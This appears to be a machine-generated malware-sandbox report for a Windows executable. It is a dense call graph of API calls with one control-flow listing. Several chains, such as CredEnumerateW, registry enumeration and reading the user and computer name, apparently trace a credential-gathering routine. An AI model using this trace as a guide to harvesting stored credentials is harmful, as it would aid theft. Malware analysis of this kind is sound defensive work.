API calls 34188 42732a 24 API calls 32996 44412e 33015 44431c 32996->33015 32998 44413a GetModuleHandleA 32999 44414c __set_app_type __p__fmode __p__commode 32998->32999 33001 4441de 32999->33001 33002 4441e6 __setusermatherr 33001->33002 33003 4441f2 33001->33003 33002->33003 33016 444306 _controlfp 33003->33016 33005 4441f7 _initterm __getmainargs _initterm 33006 44424e GetStartupInfoA 33005->33006 33008 444282 GetModuleHandleA 33006->33008 33017 40cc66 33008->33017 33012 4442b3 _cexit 33014 4442e8 33012->33014 33013 4442ac exit 33013->33012 33015->32998 33016->33005 33068 404a94 LoadLibraryA 33017->33068 33019 40cc82 33020 40cc86 33019->33020 33075 41067e 33019->33075 33020->33012 33020->33013 33022 40cc91 33079 40c9f7 ??2@YAPAXI 33022->33079 33024 40ccbd 33093 407a4b 33024->33093 33029 40cce6 33111 409596 memset 33029->33111 33030 40ccfa 33116 409465 memset 33030->33116 33035 40cea3 ??3@YAXPAX 33037 40cec1 DeleteObject 33035->33037 33038 40ced5 33035->33038 33036 407bbf _strcmpi 33039 40cd10 33036->33039 33037->33038 33140 4076d7 ??3@YAXPAX ??3@YAXPAX 33038->33140 33041 40cd14 RegDeleteKeyA 33039->33041 33042 40cd29 EnumResourceTypesA 33039->33042 33041->33035 33044 40cd51 MessageBoxA 33042->33044 33045 40cd69 33042->33045 33043 40cee6 33141 4045bd ??3@YAXPAX 33043->33141 33044->33035 33047 40cdc2 CoInitialize 33045->33047 33121 40cb90 33045->33121 33138 40c946 strncat memset RegisterClassA CreateWindowExA 33047->33138 33049 40ceef 33142 4076d7 ??3@YAXPAX ??3@YAXPAX 33049->33142 33051 40cdd3 ShowWindow UpdateWindow LoadAcceleratorsA 33139 40bfb1 PostMessageA 33051->33139 33055 40cdc0 33055->33047 33056 40cd83 ??3@YAXPAX 33056->33038 33058 40cda6 DeleteObject 33056->33058 33058->33038 33060 40ce1b GetMessageA 33061 40ce9d 33060->33061 33062 40ce2f 33060->33062 33061->33035 33063 40ce35 TranslateAccelerator 33062->33063 33065 40ce67 IsDialogMessage 33062->33065 33066 40ce5b IsDialogMessage 33062->33066 33063->33062 33064 40ce8f GetMessageA 33063->33064 33064->33061 33064->33063 33065->33064 33067 40ce79 TranslateMessage DispatchMessageA 33065->33067 33066->33064 33066->33065 33067->33064 33069 404ae3 33068->33069 33070 404abf GetProcAddress 33068->33070 33073 404af7 MessageBoxA 33069->33073 33074 404b0e 33069->33074 33071 404ad8 FreeLibrary 33070->33071 33072 404acf 33070->33072 33071->33069 33072->33071 33073->33019 33074->33019 33076 410687 LoadLibraryA 33075->33076 33077 4106ac 33075->33077 33076->33077 33078 41069b GetProcAddress 33076->33078 33077->33022 33078->33077 33080 40ca28 ??2@YAPAXI 33079->33080 33082 40ca46 33080->33082 33083 40ca4d 33080->33083 33150 40400d 6 API calls 33082->33150 33085 40ca86 33083->33085 33086 40ca79 DeleteObject 33083->33086 33143 406e26 33085->33143 33086->33085 33088 40ca8b 33146 4019b4 33088->33146 33091 4019b4 strncat 33092 40cadf _mbscpy 33091->33092 33092->33024 33152 4076d7 ??3@YAXPAX ??3@YAXPAX 33093->33152 33095 407a86 33098 4077ae malloc memcpy ??3@YAXPAX ??3@YAXPAX 33095->33098 33099 407b6b 33095->33099 33101 407b09 ??3@YAXPAX 33095->33101 33106 407b93 33095->33106 33156 4076fd 7 API calls 33095->33156 33157 406cce 33095->33157 33098->33095 33099->33106 33165 4077ae 33099->33165 33101->33095 33153 4077e4 33106->33153 33107 407bbf 33108 407be6 33107->33108 33109 407bc7 33107->33109 33108->33029 33108->33030 33109->33108 33110 407bd0 _strcmpi 33109->33110 33110->33108 33110->33109 33171 409570 33111->33171 33113 4095c5 33176 4094a2 33113->33176 33117 409570 3 API calls 33116->33117 33118 409494 33117->33118 33196 4093dd 33118->33196 33210 4023a9 33121->33210 33127 40cbf4 33299 40cafa 7 API calls 33127->33299 33128 40cbef 33132 40cc60 33128->33132 33251 40c12b memset GetModuleFileNameA strrchr 33128->33251 33132->33055 33132->33056 33134 40cc0e 33278 40ad59 33134->33278 33138->33051 33139->33060 33140->33043 33141->33049 33142->33020 33151 406d65 memset _mbscpy 33143->33151 33145 406e3d CreateFontIndirectA 33145->33088 33147 4019e0 33146->33147 33148 4019c1 strncat 33147->33148 33149 4019e4 memset LoadIconA 33147->33149 33148->33147 33149->33091 33150->33083 33151->33145 33152->33095 33154 4077f4 33153->33154 33155 4077ea ??3@YAXPAX 33153->33155 33154->33107 33155->33154 33156->33095 33158 406cd5 malloc 33157->33158 33159 406d1b 33157->33159 33161 406d11 33158->33161 33162 406cf6 33158->33162 33159->33095 33161->33095 33163 406d0a ??3@YAXPAX 33162->33163 33164 406cfa memcpy 33162->33164 33163->33161 33164->33163 33166 4077c7 33165->33166 33167 4077bc ??3@YAXPAX 33165->33167 33168 406cce 3 API calls 33166->33168 33169 4077d2 33167->33169 33168->33169 33170 4076fd 7 API calls 33169->33170 33170->33106 33187 406d34 GetModuleFileNameA 33171->33187 33173 409576 strrchr 33174 409585 33173->33174 33175 409588 _mbscat 33173->33175 33174->33175 33175->33113 33188 4446d0 33176->33188 33181 40907d 3 API calls 33182 4094ea EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33181->33182 33183 409536 LoadStringA 33182->33183 33184 40954c 33183->33184 33184->33183 33186 409564 33184->33186 33195 4090eb memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33184->33195 33186->33035 33187->33173 33189 4094af _mbscpy _mbscpy 33188->33189 33190 40907d 33189->33190 33191 4446d0 33190->33191 33192 40908a memset GetPrivateProfileStringA 33191->33192 33193 4090e5 33192->33193 33194 4090d5 WritePrivateProfileStringA 33192->33194 33193->33181 33194->33193 33195->33184 33206 406d1f GetFileAttributesA 33196->33206 33198 4093e6 33199 40945f 33198->33199 33200 4093eb _mbscpy _mbscpy GetPrivateProfileIntA 33198->33200 33199->33036 33207 408fe9 GetPrivateProfileStringA 33200->33207 33202 40943a 33208 408fe9 GetPrivateProfileStringA 33202->33208 33204 40944b 33209 408fe9 GetPrivateProfileStringA 33204->33209 33206->33198 33207->33202 33208->33204 33209->33199 33301 409989 33210->33301 33213 401e60 memset 33340 41072b 33213->33340 33216 401eb9 33370 406e81 strlen _mbscat _mbscpy _mbscat 33216->33370 33217 401ecb 33355 406d1f GetFileAttributesA 33217->33355 33220 401edd strlen strlen 33222 401f1f 33220->33222 33223 401f0c 33220->33223 33356 406d1f GetFileAttributesA 33222->33356 33371 406e81 strlen _mbscat _mbscpy _mbscat 33223->33371 33226 401f2c 33357 401c30 33226->33357 33230 401c30 7 API calls 33231 401f6c 33230->33231 33369 410411 RegOpenKeyExA 33231->33369 33232 401f88 33233 401f93 memset 33232->33233 33234 40217e 33232->33234 33372 4104d7 RegEnumKeyExA 33233->33372 33236 40219f _strcmpi 33234->33236 33237 40218c ExpandEnvironmentStringsA 33234->33237 33236->33127 33236->33128 33381 406d1f GetFileAttributesA 33237->33381 33239 402175 RegCloseKey 33239->33234 33240 401fd0 atoi 33241 401fe6 memset memset sprintf 33240->33241 33249 401fc0 33240->33249 33373 410493 33241->33373 33244 40215c 33244->33239 33245 40206d memset memset strlen strlen 33245->33249 33246 4020d4 strlen strlen 33246->33249 33247 406e81 strlen _mbscat _mbscpy _mbscat 33247->33249 33248 406d1f GetFileAttributesA 33248->33249 33249->33239 33249->33240 33249->33244 33249->33245 33249->33246 33249->33247 33249->33248 33250 40215e _mbscpy 33249->33250 33380 4104d7 RegEnumKeyExA 33249->33380 33250->33239 33252 40c17b 33251->33252 33253 40c17e _mbscat _mbscpy _mbscpy 33251->33253 33252->33253 33254 40c1f6 33253->33254 33255 40c26b 33254->33255 33256 40c25b GetWindowPlacement 33254->33256 33257 40c291 33255->33257 33402 4017d1 GetSystemMetrics GetSystemMetrics SetWindowPos 33255->33402 33256->33255 33395 40989e 33257->33395 33261 40b783 33262 40b7e2 33261->33262 33269 40b797 33261->33269 33405 406a00 LoadCursorA SetCursor 33262->33405 33264 40b7e7 33406 410411 RegOpenKeyExA 33264->33406 33407 40472f 33264->33407 33415 404780 33264->33415 33418 403c03 33264->33418 33494 410166 33264->33494 33265 40b79e _mbsicmp 33265->33269 33266 40b7fb 33267 407bbf _strcmpi 33266->33267 33271 40b80b 33267->33271 33268 40b855 SetCursor 33268->33134 33269->33262 33269->33265 33497 40b340 10 API calls 33269->33497 33271->33268 33272 40b84c qsort 33271->33272 33272->33268 33279 40ad6d 33278->33279 33858 409b5a SendMessageA ??2@YAPAXI ??3@YAXPAX 33278->33858 33281 40ad75 33279->33281 33282 40ad7e GetStdHandle 33279->33282 33857 406ab8 CreateFileA 33281->33857 33284 40ad7b 33282->33284 33285 40ad94 33284->33285 33286 40ae8c 33284->33286 33859 406a00 LoadCursorA SetCursor 33285->33859 33863 406b15 9 API calls 33286->33863 33289 40ae95 33300 40c2d6 28 API calls 33289->33300 33290 40ada1 33291 40ade6 33290->33291 33297 40ae00 33290->33297 33860 40a2db strlen WriteFile 33290->33860 33291->33297 33861 40a3f8 12 API calls 33291->33861 33294 40ae35 33295 40ae75 CloseHandle 33294->33295 33296 40ae7e SetCursor 33294->33296 33295->33296 33296->33289 33297->33294 33862 406b15 9 API calls 33297->33862 33299->33128 33300->33132 33313 40979f 33301->33313 33304 4099ed memcpy memcpy 33305 409a47 33304->33305 33305->33304 33306 409a85 ??2@YAPAXI ??2@YAPAXI 33305->33306 33310 408b27 12 API calls 33305->33310 33308 409ac1 ??2@YAPAXI 33306->33308 33309 409af8 33306->33309 33308->33309 33323 409909 33309->33323 33310->33305 33312 4023b8 33312->33213 33314 4097b1 33313->33314 33315 4097aa ??3@YAXPAX 33313->33315 33316 4097b8 ??3@YAXPAX 33314->33316 33317 4097bf 33314->33317 33315->33314 33316->33317 33318 4097d0 33317->33318 33319 4097c9 ??3@YAXPAX 33317->33319 33320 4097f0 ??2@YAPAXI ??2@YAPAXI 33318->33320 33321 4097e0 ??3@YAXPAX 33318->33321 33322 4097e9 ??3@YAXPAX 33318->33322 33319->33318 33320->33304 33321->33322 33322->33320 33324 4077e4 ??3@YAXPAX 33323->33324 33325 409912 33324->33325 33326 4077e4 ??3@YAXPAX 33325->33326 33327 40991a 33326->33327 33328 4077e4 ??3@YAXPAX 33327->33328 33329 409922 33328->33329 33330 4077e4 ??3@YAXPAX 33329->33330 33331 40992a 33330->33331 33332 4077ae 4 API calls 33331->33332 33333 40993d 33332->33333 33334 4077ae 4 API calls 33333->33334 33335 409947 33334->33335 33336 4077ae 4 API calls 33335->33336 33337 409951 33336->33337 33338 4077ae 4 API calls 33337->33338 33339 40995b 33338->33339 33339->33312 33341 41067e 2 API calls 33340->33341 33342 41073a 33341->33342 33343 41076d memset 33342->33343 33382 406e4c 33342->33382 33345 41078d 33343->33345 33385 410411 RegOpenKeyExA 33345->33385 33348 401e95 strlen strlen 33348->33216 33348->33217 33349 4107ba 33350 4107ef _mbscpy 33349->33350 33386 4106ad _mbscpy 33349->33386 33350->33348 33352 4107cb 33387 410452 RegQueryValueExA 33352->33387 33354 4107e3 RegCloseKey 33354->33350 33355->33220 33356->33226 33388 410411 RegOpenKeyExA 33357->33388 33359 401c4b 33360 401cac 33359->33360 33389 410452 RegQueryValueExA 33359->33389 33360->33230 33360->33231 33362 401c69 33363 401c70 strchr 33362->33363 33364 401ca3 RegCloseKey 33362->33364 33363->33364 33365 401c84 strchr 33363->33365 33364->33360 33365->33364 33366 401c93 33365->33366 33390 406ca4 strlen 33366->33390 33368 401ca0 33368->33364 33369->33232 33370->33217 33371->33222 33372->33249 33393 410411 RegOpenKeyExA 33373->33393 33375 4104a9 33376 4104d2 33375->33376 33394 410452 RegQueryValueExA 33375->33394 33376->33249 33378 4104c1 RegCloseKey 33378->33376 33380->33249 33381->33236 33383 406e5b GetVersionExA 33382->33383 33384 406e6c 33382->33384 33383->33384 33384->33343 33384->33348 33385->33349 33386->33352 33387->33354 33388->33359 33389->33362 33391 406cb5 33390->33391 33392 406cb8 memcpy 33390->33392 33391->33392 33392->33368 33393->33375 33394->33378 33396 4098ad 33395->33396 33398 4098bb 33395->33398 33403 409669 memset SendMessageA 33396->33403 33399 409906 33398->33399 33400 4098f8 33398->33400 33399->33261 33404 4095d9 SendMessageA 33400->33404 33402->33257 33403->33398 33404->33399 33405->33264 33406->33266 33408 404780 FreeLibrary 33407->33408 33409 404736 LoadLibraryA 33408->33409 33410 404747 GetProcAddress 33409->33410 33411 404769 33409->33411 33410->33411 33412 40475f 33410->33412 33413 40477c 33411->33413 33414 404780 FreeLibrary 33411->33414 33412->33411 33413->33266 33414->33413 33416 404794 FreeLibrary 33415->33416 33417 40479e 33415->33417 33416->33417 33417->33266 33419 410166 FreeLibrary 33418->33419 33420 403c1d LoadLibraryA 33419->33420 33421 403c61 33420->33421 33422 403c31 GetProcAddress 33420->33422 33424 410166 FreeLibrary 33421->33424 33422->33421 33423 403c4b 33422->33423 33423->33421 33427 403c58 33423->33427 33425 403c68 33424->33425 33426 40472f 3 API calls 33425->33426 33428 403c73 33426->33428 33427->33425 33498 4036d7 33428->33498 33431 4036d7 26 API calls 33432 403c87 33431->33432 33433 4036d7 26 API calls 33432->33433 33434 403c91 33433->33434 33435 4036d7 26 API calls 33434->33435 33436 403c9b 33435->33436 33510 408344 33436->33510 33444 403cd2 33445 403ce4 33444->33445 33693 402bc3 39 API calls 33444->33693 33558 410411 RegOpenKeyExA 33445->33558 33448 403cf7 33449 403d09 33448->33449 33694 402bc3 39 API calls 33448->33694 33559 402c4f 33449->33559 33453 406e4c GetVersionExA 33454 403d1e 33453->33454 33577 410411 RegOpenKeyExA 33454->33577 33456 403d3e 33457 403d4e 33456->33457 33695 402b14 46 API calls 33456->33695 33578 410411 RegOpenKeyExA 33457->33578 33460 403d74 33461 403d84 33460->33461 33696 402b14 46 API calls 33460->33696 33579 410411 RegOpenKeyExA 33461->33579 33464 403daa 33465 403dba 33464->33465 33697 402b14 46 API calls 33464->33697 33580 41017d 33465->33580 33469 404780 FreeLibrary 33470 403dd5 33469->33470 33584 402fcd 33470->33584 33473 402fcd 34 API calls 33474 403ded 33473->33474 33600 4032a9 33474->33600 33483 403e28 33485 403e60 33483->33485 33486 403e33 _mbscpy 33483->33486 33647 40f478 33485->33647 33699 40eca9 303 API calls 33486->33699 33495 410171 FreeLibrary 33494->33495 33496 41017c 33494->33496 33495->33496 33496->33266 33497->33269 33499 4037b7 33498->33499 33500 4036ed 33498->33500 33499->33431 33700 4101d8 UuidFromStringA UuidFromStringA memcpy 33500->33700 33502 403700 33502->33499 33503 403708 strchr 33502->33503 33503->33499 33504 403722 33503->33504 33701 4021ad memset 33504->33701 33506 403731 _mbscpy _mbscpy strlen 33507 403796 _mbscpy 33506->33507 33508 40377b sprintf 33506->33508 33702 4023d7 16 API calls 33507->33702 33508->33507 33511 408354 33510->33511 33703 408043 11 API calls 33511->33703 33515 408372 33516 403ca7 33515->33516 33517 40837d memset 33515->33517 33528 407f93 33516->33528 33706 4104d7 RegEnumKeyExA 33517->33706 33519 408444 RegCloseKey 33519->33516 33521 4083a9 33521->33519 33522 4083ce memset 33521->33522 33707 410411 RegOpenKeyExA 33521->33707 33710 4104d7 RegEnumKeyExA 33521->33710 33708 410452 RegQueryValueExA 33522->33708 33525 408406 33709 4081fd 10 API calls 33525->33709 33527 40841d RegCloseKey 33527->33521 33711 410411 RegOpenKeyExA 33528->33711 33530 407fb5 33531 403cb3 33530->33531 33532 407fbc memset 33530->33532 33540 408458 33531->33540 33712 4104d7 RegEnumKeyExA 33532->33712 33534 408035 RegCloseKey 33534->33531 33536 407fe5 33536->33534 33713 410411 RegOpenKeyExA 33536->33713 33714 407e63 11 API calls 33536->33714 33715 4104d7 RegEnumKeyExA 33536->33715 33539 408018 RegCloseKey 33539->33536 33716 4045d6 33540->33716 33543 408660 33724 404651 33543->33724 33545 4084a5 33545->33543 33548 4084af wcslen 33545->33548 33547 4084a3 CredEnumerateW 33547->33545 33548->33543 33555 4084e2 33548->33555 33549 4084ec _wcsncoll 33549->33555 33551 40472f 3 API calls 33551->33555 33552 404780 FreeLibrary 33552->33555 33553 408584 memset 33554 4085b1 memcpy wcschr 33553->33554 33553->33555 33554->33555 33555->33543 33555->33549 33555->33551 33555->33552 33555->33553 33555->33554 33556 408634 LocalFree 33555->33556 33727 404666 _mbscpy 33555->33727 33556->33555 33557 410411 RegOpenKeyExA 33557->33444 33558->33448 33728 410411 RegOpenKeyExA 33559->33728 33561 402c6c 33562 402d97 33561->33562 33563 402c79 memset 33561->33563 33562->33453 33729 4104d7 RegEnumKeyExA 33563->33729 33565 402d8e RegCloseKey 33565->33562 33566 410493 3 API calls 33567 402cd6 memset sprintf 33566->33567 33730 410411 RegOpenKeyExA 33567->33730 33569 402d1a 33570 402d2c sprintf 33569->33570 33731 402bc3 39 API calls 33569->33731 33732 410411 RegOpenKeyExA 33570->33732 33575 402ca4 33575->33565 33575->33566 33576 402d8c 33575->33576 33733 402bc3 39 API calls 33575->33733 33734 4104d7 RegEnumKeyExA 33575->33734 33576->33565 33577->33456 33578->33460 33579->33464 33581 41018b 33580->33581 33582 410166 FreeLibrary 33581->33582 33583 403dca 33582->33583 33583->33469 33735 410411 RegOpenKeyExA 33584->33735 33586 402feb 33587 402ff8 memset 33586->33587 33588 40311e 33586->33588 33736 4104d7 RegEnumKeyExA 33587->33736 33588->33473 33590 403114 RegCloseKey 33590->33588 33591 410493 3 API calls 33592 40304a memset sprintf 33591->33592 33737 410411 RegOpenKeyExA 33592->33737 33594 403094 memset 33738 4104d7 RegEnumKeyExA 33594->33738 33596 4030eb RegCloseKey 33598 403025 33596->33598 33598->33590 33598->33591 33598->33594 33598->33596 33599 4104d7 RegEnumKeyExA 33598->33599 33739 402da5 26 API calls 33598->33739 33599->33598 33601 4032c7 33600->33601 33602 40339b 33600->33602 33740 4021ad memset 33601->33740 33615 4034d6 memset memset 33602->33615 33604 4032d3 33741 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33604->33741 33606 4032dc 33607 4032ea memset GetPrivateProfileSectionA 33606->33607 33742 4023d7 16 API calls 33606->33742 33607->33602 33609 403321 33607->33609 33609->33602 33610 40338d strlen 33609->33610 33743 4021ad memset 33609->33743 33744 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33609->33744 33745 4023d7 16 API calls 33609->33745 33610->33602 33610->33609 33612 403342 strchr 33612->33609 33616 410493 3 API calls 33615->33616 33617 403531 33616->33617 33618 403571 33617->33618 33619 403538 _mbscpy 33617->33619 33623 403977 33618->33623 33746 406af3 strlen _mbscat 33619->33746 33621 403557 _mbscat 33747 4033e2 19 API calls 33621->33747 33748 404666 _mbscpy 33623->33748 33627 40399c 33628 4039f1 33627->33628 33749 40edd5 memset memset 33627->33749 33770 40f057 33627->33770 33786 4038da 21 API calls 33627->33786 33630 404780 FreeLibrary 33628->33630 33631 4039fd 33630->33631 33632 4037bc memset memset 33631->33632 33794 443a35 memset 33632->33794 33635 4038d4 33635->33483 33698 40eca9 303 API calls 33635->33698 33637 403820 33638 406ca4 2 API calls 33637->33638 33639 403835 33638->33639 33640 406ca4 2 API calls 33639->33640 33641 403847 strchr 33640->33641 33642 403876 _mbscpy 33641->33642 33643 403889 strlen 33641->33643 33644 4038b1 _mbscpy 33642->33644 33643->33644 33645 403896 sprintf 33643->33645 33806 4023d7 16 API calls 33644->33806 33645->33644 33648 4446d0 33647->33648 33649 40f488 RegOpenKeyExA 33648->33649 33650 40f4b3 RegOpenKeyExA 33649->33650 33651 403e6c 33649->33651 33652 40f5a5 RegCloseKey 33650->33652 33653 40f4cd RegQueryValueExA 33650->33653 33661 40f2e4 33651->33661 33652->33651 33654 40f59b RegCloseKey 33653->33654 33655 40f4fc 33653->33655 33654->33652 33656 40472f 3 API calls 33655->33656 33657 40f509 33656->33657 33657->33654 33658 40f591 LocalFree 33657->33658 33659 40f555 memcpy memcpy 33657->33659 33658->33654 33811 40f177 11 API calls 33659->33811 33662 406e4c GetVersionExA 33661->33662 33663 40f305 33662->33663 33664 4045d6 7 API calls 33663->33664 33667 40f321 33664->33667 33665 404651 FreeLibrary 33666 403e72 33665->33666 33673 4437d7 memset 33666->33673 33668 40f45e 33667->33668 33669 40f38b memset WideCharToMultiByte 33667->33669 33668->33665 33669->33667 33670 40f3bb _strnicmp 33669->33670 33670->33667 33671 40f3d3 WideCharToMultiByte 33670->33671 33671->33667 33672 40f400 WideCharToMultiByte 33671->33672 33672->33667 33674 41072b 9 API calls 33673->33674 33675 443816 33674->33675 33812 40732d strlen strlen 33675->33812 33680 41072b 9 API calls 33681 44383d 33680->33681 33682 40732d 3 API calls 33681->33682 33683 443847 33682->33683 33684 4436ff 65 API calls 33683->33684 33685 443853 memset memset 33684->33685 33686 410493 3 API calls 33685->33686 33687 4438a6 ExpandEnvironmentStringsA strlen 33686->33687 33688 4438e1 _strcmpi 33687->33688 33689 4438d2 33687->33689 33690 403e7e 33688->33690 33691 4438f9 33688->33691 33689->33688 33690->33266 33692 4436ff 65 API calls 33691->33692 33692->33690 33693->33445 33694->33449 33695->33457 33696->33461 33697->33465 33698->33483 33699->33485 33700->33502 33701->33506 33702->33499 33704 40818e 33703->33704 33705 410411 RegOpenKeyExA 33704->33705 33705->33515 33706->33521 33707->33521 33708->33525 33709->33527 33710->33521 33711->33530 33712->33536 33713->33536 33714->33539 33715->33536 33717 404651 FreeLibrary 33716->33717 33718 4045de LoadLibraryA 33717->33718 33719 40464c 33718->33719 33720 4045ef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33718->33720 33719->33543 33719->33545 33719->33547 33721 404638 33720->33721 33722 40463e 33721->33722 33723 404651 FreeLibrary 33721->33723 33722->33719 33723->33719 33725 403cbf 33724->33725 33726 404657 FreeLibrary 33724->33726 33725->33557 33726->33725 33727->33555 33728->33561 33729->33575 33730->33569 33731->33570 33732->33575 33733->33575 33734->33575 33735->33586 33736->33598 33737->33598 33738->33598 33739->33598 33740->33604 33741->33606 33742->33607 33743->33612 33744->33609 33745->33609 33746->33621 33747->33618 33748->33627 33787 407649 33749->33787 33752 407649 _mbsnbcat 33753 40ef18 RegOpenKeyExA 33752->33753 33754 40ef38 RegQueryValueExA 33753->33754 33755 40f04e 33753->33755 33756 40f045 RegCloseKey 33754->33756 33757 40ef65 33754->33757 33755->33627 33756->33755 33757->33756 33766 40efea 33757->33766 33791 404666 _mbscpy 33757->33791 33759 40ef86 33761 40472f 3 API calls 33759->33761 33767 40ef8b 33761->33767 33762 40f013 RegQueryValueExA 33762->33756 33763 40f036 33762->33763 33763->33756 33764 40efdf 33765 404780 FreeLibrary 33764->33765 33765->33766 33766->33756 33792 4012ee strlen 33766->33792 33767->33764 33768 40efd6 LocalFree 33767->33768 33769 40efba memcpy 33767->33769 33768->33764 33769->33768 33793 404666 _mbscpy 33770->33793 33772 40f06f 33773 4045d6 7 API calls 33772->33773 33774 40f07d 33773->33774 33775 40f157 33774->33775 33776 40472f 3 API calls 33774->33776 33777 404651 FreeLibrary 33775->33777 33781 40f08a 33776->33781 33778 40f166 33777->33778 33779 404780 FreeLibrary 33778->33779 33780 40f171 33779->33780 33780->33627 33781->33775 33782 40f10c WideCharToMultiByte 33781->33782 33783 40f12d strlen 33782->33783 33784 40f14e LocalFree 33782->33784 33783->33784 33785 40f13d _mbscpy 33783->33785 33784->33775 33785->33784 33786->33627 33788 407675 33787->33788 33789 407656 _mbsnbcat 33788->33789 33790 407679 33788->33790 33789->33788 33790->33752 33791->33759 33792->33762 33793->33772 33807 410411 RegOpenKeyExA 33794->33807 33796 443a6f 33797 40380c 33796->33797 33808 410452 RegQueryValueExA 33796->33808 33797->33635 33805 4021ad memset 33797->33805 33799 443a88 33800 443ac0 RegCloseKey 33799->33800 33809 410452 RegQueryValueExA 33799->33809 33800->33797 33802 443aa5 33802->33800 33810 443d5d 30 API calls 33802->33810 33804 443abe 33804->33800 33805->33637 33806->33635 33807->33796 33808->33799 33809->33802 33810->33804 33811->33658 33813 407358 33812->33813 33814 40734a _mbscat 33812->33814 33815 4436ff 33813->33815 33814->33813 33832 407c2c 33815->33832 33818 44373a 33819 443761 33818->33819 33820 443745 33818->33820 33840 407c87 33818->33840 33821 407c2c 9 API calls 33819->33821 33853 443683 52 API calls 33820->33853 33829 44378d 33821->33829 33823 407c87 9 API calls 33823->33829 33824 4437bb 33850 407d1f 33824->33850 33828 407d1f FindClose 33830 4437d1 33828->33830 33829->33823 33829->33824 33831 4436ff 65 API calls 33829->33831 33854 407bf1 strcmp strcmp 33829->33854 33830->33680 33831->33829 33833 407d1f FindClose 33832->33833 33834 407c39 33833->33834 33835 406ca4 2 API calls 33834->33835 33836 407c4c strlen strlen 33835->33836 33837 407c70 33836->33837 33838 407c79 33836->33838 33855 406e81 strlen _mbscat _mbscpy _mbscat 33837->33855 33838->33818 33841 407c92 FindFirstFileA 33840->33841 33842 407cb3 FindNextFileA 33840->33842 33843 407cce 33841->33843 33844 407cd5 strlen strlen 33842->33844 33845 407cc9 33842->33845 33843->33844 33847 407d0e 33843->33847 33844->33847 33848 407d05 33844->33848 33846 407d1f FindClose 33845->33846 33846->33843 33847->33818 33856 406e81 strlen _mbscat _mbscpy _mbscat 33848->33856 33851 407d32 33850->33851 33852 407d28 FindClose 33850->33852 33851->33828 33852->33851 33853->33818 33854->33829 33855->33838 33856->33847 33857->33284 33858->33279 33859->33290 33860->33291 33861->33297 33862->33294 33863->33289 34033 426928 CloseHandle memset memset 34191 405f2b 12 API calls 34193 42df2e 127 API calls 32968 410531 32971 410344 32968->32971 32972 410351 32971->32972 32973 410398 memset GetPrivateProfileStringA 32972->32973 32974 41035f memset 32972->32974 32979 4073d5 strlen 32973->32979 32984 40735c sprintf memcpy 32974->32984 32977 410381 WritePrivateProfileStringA 32978 4103da 32977->32978 32980 4073e9 32979->32980 32982 4073eb 32979->32982 32980->32978 32981 407432 32981->32978 32982->32981 32985 40710b strtoul 32982->32985 32984->32977 32985->32982 34194 43f332 133 API calls 34196 418f35 61 API calls 34198 425e13 109 API calls 34040 411136 InterlockedCompareExchange RtlInitializeCriticalSection 34042 425e13 19 API calls 34046 440132 34 API calls 34048 4111c1 RtlInitializeCriticalSection memset 34203 4157c8 16 API calls 34205 43f3ce 138 API calls 34051 4275cd 44 API calls 34207 424852 108 API calls 34209 42dbd4 18 API calls 34054 40c5d8 18 API calls 34210 432bda 16 API calls 34211 43ebd9 22 API calls 33883 4105dd FindResourceA 33884 4105f6 SizeofResource 33883->33884 33887 410620 33883->33887 33885 410607 LoadResource 33884->33885 33884->33887 33886 410615 LockResource 33885->33886 33885->33887 33886->33887 34214 4013de 15 API calls 34217 424852 76 API calls 34058 4141e7 15 API calls 34219 43ebdd 25 API calls 34220 43efec 18 API calls 34222 443ff5 _onexit 34060 4021f6 14 API calls 34224 427bfb 36 API calls 34062 433982 16 API calls 34064 411182 InterlockedCompareExchange RtlDeleteCriticalSection 34227 412786 _endthreadex 34065 401591 8 API calls 34230 432b91 15 API calls 34231 43eb91 17 API calls 34068 410597 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34232 43ff95 20 API calls 34233 42af9d 31 API calls 34234 424852 119 API calls 34236 4143a4 18 API calls 34239 409fae 12 API calls 34073 419db5 42 API calls 34240 4167b5 memset 34241 4293b4 10 API calls 34074 40f5b8 70 API calls 34076 4375b9 22 API calls 34246 4243bd 15 API calls

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                          • API String ID: 1832431107-3760989150
